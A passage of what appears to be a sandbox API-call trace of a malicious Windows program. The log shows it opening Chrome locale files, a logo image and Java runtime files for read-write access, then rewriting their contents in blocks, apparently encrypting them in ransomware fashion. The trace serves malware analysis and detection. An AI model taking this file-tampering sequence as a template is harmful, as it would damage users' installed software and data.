lpBuffer=0x1ea7988*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.655] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x41442 [0116.655] WriteFile (in: hFile=0x208, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.655] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0116.655] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0116.656] CloseHandle (hObject=0x208) returned 1 [0116.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0116.658] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.658] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x9f1a1 [0116.658] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.658] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.658] ReleaseMutex (hMutex=0x168) returned 1 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gu.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0116.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gu.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gu.pak", lpUsedDefaultChar=0x0) returned 6 [0116.659] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0116.678] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.712] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9e1a1 [0116.712] ReadFile (in: hFile=0x208, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.736] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9e1a1 [0116.737] WriteFile (in: hFile=0x208, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.737] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0116.737] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0116.737] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.738] CloseHandle (hObject=0x208) returned 1 [0116.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0116.753] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.753] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb6beb [0116.753] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.753] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.753] ReleaseMutex (hMutex=0x168) returned 1 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kn.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kn.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kn.pak", lpUsedDefaultChar=0x0) returned 6 [0116.754] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0116.758] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.506] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xb5beb [0117.507] ReadFile (in: hFile=0x208, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.556] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xb5beb [0117.557] WriteFile (in: hFile=0x208, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.558] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0117.558] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.559] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.559] CloseHandle (hObject=0x208) returned 1 [0117.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nl.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0117.561] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0117.561] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4d450 [0117.561] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0117.561] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.561] ReleaseMutex (hMutex=0x168) returned 1 [0117.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nl.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0117.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nl.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nl.pak", lpUsedDefaultChar=0x0) returned 6 [0117.562] ReadFile (in: hFile=0x208, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.564] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4c450 [0117.564] ReadFile (in: hFile=0x208, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.568] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4c450 [0117.568] WriteFile (in: hFile=0x208, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.568] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0117.568] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.569] CloseHandle (hObject=0x208) returned 1 [0117.569] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0117.570] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0117.570] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x79e3c [0117.571] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0117.571] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.571] ReleaseMutex (hMutex=0x168) returned 1 [0117.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sr.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0117.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sr.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sr.pak", lpUsedDefaultChar=0x0) returned 6 [0117.571] ReadFile (in: hFile=0x208, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.579] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x78e3c [0117.579] ReadFile (in: hFile=0x208, lpBuffer=0x1e953d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.584] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x78e3c [0117.584] WriteFile (in: hFile=0x208, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.585] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0117.586] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.586] CloseHandle (hObject=0x208) returned 1 [0117.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0117.588] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0117.588] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5af42 [0117.588] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0117.588] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.588] ReleaseMutex (hMutex=0x168) returned 1 [0117.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vi.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0117.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vi.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vi.pak", lpUsedDefaultChar=0x0) returned 6 [0117.589] ReadFile (in: hFile=0x208, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.597] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x59f42 [0117.597] ReadFile (in: hFile=0x208, lpBuffer=0x1e953d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.605] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x59f42 [0117.606] WriteFile (in: hFile=0x208, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.607] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0117.607] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.607] CloseHandle (hObject=0x208) returned 1 [0117.608] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.208] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.208] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5741 [0118.208] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.208] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.208] ReleaseMutex (hMutex=0x168) returned 1 [0118.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logocanary.png", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logocanary.png", cchWideChar=14, lpMultiByteStr=0x1f7360c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logocanary.png", lpUsedDefaultChar=0x0) returned 14 [0118.208] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.219] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4741 [0118.220] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4741 [0118.265] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0118.266] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.266] CloseHandle (hObject=0x1cc) returned 1 [0118.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.267] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa", lpFilePart=0x311f690*="classes.jsa") returned 0x37 [0118.267] GetLastError () returned 0x5 [0118.267] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0118.267] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.267] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.267] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0118.268] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0118.290] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0118.290] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa")) returned 0x21 [0118.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.293] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.294] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xcda8 [0118.294] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.294] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.294] ReleaseMutex (hMutex=0x168) returned 1 [0118.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2launcher.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2launcher.exe", cchWideChar=15, lpMultiByteStr=0x1f7344c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2launcher.exe", lpUsedDefaultChar=0x0) returned 15 [0118.294] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0118.307] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbda8 [0118.307] ReadFile (in: hFile=0x1f0, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.324] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbda8 [0118.324] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, 